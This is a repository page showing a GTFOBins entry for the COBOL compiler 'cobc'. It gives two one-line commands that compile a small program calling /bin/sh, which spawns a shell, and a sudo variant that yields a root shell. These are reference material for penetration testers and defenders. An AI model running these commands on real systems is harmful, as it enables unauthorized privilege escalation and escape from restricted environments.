This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
23a082d1e3856c4913b4ca63ec44bebf8339621a
GTFOBins.github.io
/
_gtfobins
/
cobc.md
bcoles
b94b01477c
Create cobc.md
2020-03-14 11:53:05 +01:00
319 B
Raw
Blame
History
functions
functions
shell
sudo
code
TF=$(mktemp -d) echo 'CALL "SYSTEM" USING "/bin/sh".' > $TF/x cobc -xFj --frelax-syntax-checks $TF/x
code
TF=$(mktemp -d) echo 'CALL "SYSTEM" USING "/bin/sh".' > $TF/x sudo cobc -xFj --frelax-syntax-checks $TF/x
Reference in New Issue
View Git Blame
Copy Permalink